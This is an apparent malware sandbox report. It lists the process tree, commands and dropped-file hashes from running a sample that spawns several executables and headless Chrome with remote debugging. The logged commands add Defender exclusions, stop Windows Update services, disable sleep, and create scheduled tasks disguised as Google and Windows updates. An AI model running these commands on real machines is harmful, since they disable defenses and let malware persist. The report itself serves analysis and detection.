PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 4952 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe

"C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 288

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=24408 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7fff8d989758,0x7fff8d989768,0x7fff8d989778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1164 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=856 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=24408 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1836 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2296 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2460 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3040 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3224 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3368 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3352 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3d0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#ncuutrkdsmtxr#> powershell <#ncuutrkdsmtxr#> -Verb <#ncuutrkdsmtxr#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 11:15 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 11:15 /f /tn WindowsSecurityUpdate_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Local State

MD5 4f6f8c24f7b066d975323e2fc8098a3e
SHA1 0b4d1e85a3fdeb8aedc773c3542ad7fa7dfc0d87
SHA256 c108254032d518ffc4d58c58b471ff4987e10b1e2a186aea63d1a479364a4ce9
SHA512 e77d2cca3f770563e536b537be84e1ee1e40a63bea4019f665f74ab424e28b5801bb4c47143ef7b17f608ade8943944402efb0a8c616c79f16f90758d8eb2558

\??\pipe\crashpad_4908_JKGWYXDXLPYQIEHI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Local Storage\leveldb\LOG

MD5 73393cb902cddc69e0cab8ef38b49c2f
SHA1 7fccfe737b005ce9ea0e883a0817067af2820b1e
SHA256 c231fd23534ec6ea79f5651956fb064e6d49f07a17bec109008444153d6a9da1
SHA512 5c4910cdb3f8c1f5713c1c78eac2e0cf0d7ef08e37a7a67425528a7cb28bda265bc002f6ff2e939f0b13197da1ab4a0cb0cd42bf047a0df556d8dffc8aa99fc5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Local Storage\leveldb\LOG.old

MD5 28f23e1173a2f5420b8c577172b935e0
SHA1 f30aed4a3fcf4e089c112a2cfef4b16e1b19cfe3
SHA256 cfe91e2c0dab8ffa8c1350c15c9d30d297ce20bae24a0049560010d9328e8302
SHA512 4eda7103f7a43fbe16da91233f50ba7e4f4cb5be08a35bb750f76401d5ad9afb7520a4d9449e5d8a253d997d596a43658d94316254fa33332b4eeb176f282e98

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qubruuej.2h5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 85ffe13c53f41d3d0a15fba593b1f55a
SHA1 705fd1ecbc42d966b8d8b4ce23a9a1396122fb5e
SHA256 b1ce56240f9b331bb6cc2890d73add836c65e289305978915f52cc243191811d
SHA512 0d4829bc947fd3a8743c29a56c3008b1519ef714a5f637db275dd6aef394c236d995fe447b37ef9a7b11b9c43cf731436b50130b670c3cb5303ec4510321be93

C:\Program Files\Google\Chrome\updater.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000001.dbtmp

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 372ab26fec5eaa8c2c88a4096f46d618
SHA1 318a5a1690ba296673541936d9be70951129e538
SHA256 e2952d0ec9ab8d5b904f975b22178c81462fa50808cef82756a69b6596eda12f
SHA512 8f66040799a3797dbfe199d112f6bc080a35e834339415ad60c60480a3846da3d7b4854acffb08e7f4e6b20929432b06cb623c48bcb687624d683d8e83787406

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe586f11.TMP

MD5 1c75d4f0df330fa9bb778f4048e0f92e
SHA1 30d5ab2d389a174a7a618ce45c12cd83542d1ea6
SHA256 8eeb9b6077839b0380b83f8bc7367fbd67ad3f29947a48024c51639ca254084f
SHA512 2d21894680c85e599349ac3bd33096921a1dac1d78bb1eb9b11051c3438f89129938dbf7e04b6df7abd63fc43bbb9f8ef38575034a39e5a40c9dcf40220d33c5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ddd8d97668746260c8cb110954665110
SHA1 734560ddae61c8eb14349574761ef8c28bd00d82
SHA256 175314bdc6a1e79b547c89eb73622c2db0d7c81da4abc9885ab2593a9901bf74
SHA512 9cd9ee3c2dbd933c8c7925a6cd46fe941e8846a4ad2b9ed0d2d2b86cfb0e51841dc6d64243f889de17a3959394f1aa69c94566c61a10ba31bbb347a8ab246b11

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\ScriptCache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 e2bada2e17f73dea737ce52b6f14fdae
SHA1 d2f4852e16523839078ac3e40bdd3eddd7fa9735
SHA256 e14b8185d2c2d4f04a6face0098c281ff9afcc60314f15a971e17961ea1a3a30
SHA512 a0ff8a00b16562e3c745359e1caa02c2032907161f77f0eddffcaaf4f108cdecbe0992de8e100325d9face25c398559993247ecab91c3740a6c571a90afd39c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5878e4.TMP

MD5 2b41539e8984e416a631d511ec4e4354
SHA1 2822c68b93a0a2b14d070e1c4d1044bc7729523b
SHA256 634ec113ba15447b029322de19c947440fa5425a5affbc1285021d36ddc09b64
SHA512 950420eeede311774097279d863ace923710367b78446263f47badd5bc78a6e1a4f35a8d194cbe63cf779528e692b286eb3b0dcf53ddda815e98a25771c58a0d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Code Cache\js\index-dir\the-real-index

MD5 abb10104558e5432bdcec612fc7a468c
SHA1 4d28c79b0a3128e0b64e746c6d48d6edb4e80771
SHA256 affbc88e0cf9862cf5674cb200fe51d7bccb2a3c3ee9df33823ae9b97f599e2d
SHA512 e01880f28180ed6a2fd5f7821fb6c6c8db624a41e75614322c267ef5b263e3de16d799fc5a78a805960c9dae3a1f11db9295c360aab675cdb929acbda7af2b45

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b04c051ce481ff1da4f29663ab4d97a9
SHA1 8ff2b51e95bb7b16a12f55907a027ed602a071ac
SHA256 0e6bcc897fda878f13a80406f95dc319552de25fecd73d576cb0a3beffba4efb
SHA512 0a7919c5614895dd5319082f9735fa699eda99ef3d2f616319c84761556273508a13e3fe0366b31bc0a9c1257101173d78fb979177608ad46879b04ed8f170c6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Code Cache\js\index-dir\the-real-index

MD5 fda3e4d42133800dfd30881b2a85209e
SHA1 a060650399d33acfc502e067151219fcbc8e3a54
SHA256 7ddfd655d71821ac3ebd11b4ea73859b14fa6b87de3c00184c0a48e561ee33f2
SHA512 f505609d1dfd46b7d3be04386f103e3d18a472a6b7aea545d761a31e05d76287e935338e7f04aea4b6fe0ee869770c1213c822ad942a8390f87210cf831e4386

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ed848ec6-6221-448b-ac78-b2a80c924fb6\index-dir\the-real-index

MD5 b9772850a57ec32c83f70674dc4a4e28
SHA1 cbea822cebdfa45ae6e725b5fd8197df59ff45f8
SHA256 5d9b6da13fc805061b044ea2bd009968d55c43e82d9da215c20c09fb9b2daa9d
SHA512 579017234581e6573cc3ad9a2acd7d9f04b3dd06d5701c8ae6b238753e29a16ddadf18c99e91b6cda3c626dbb247b8d0391f96eff83f676afeb355e057ecef3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ed848ec6-6221-448b-ac78-b2a80c924fb6\index-dir\the-real-index~RFe5878e4.TMP

MD5 47ee9f52318dbeb13bea54450483a0b4
SHA1 0ad25feb6836ee7ace6628de27339bbc68ab6f04
SHA256 051975e7e02cd277308c0ea9083e860fd9a44df2f2daef1aa5d54dd6e0aa80a9
SHA512 989a45d413eeb4ab0bccbc9ff4bc8e89b4f58a3aef3f4c786fa301212256bb3a57cb3912f88d31f238520c3f8ef7242121a7b0c64b60670b7ffc7f1c78ab21e3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\DevToolsActivePort

MD5 778d6609ee35f0ca7d0cceda0e435451
SHA1 67e44423111d72193a41ee4e7f1c4edb20c2cf8a
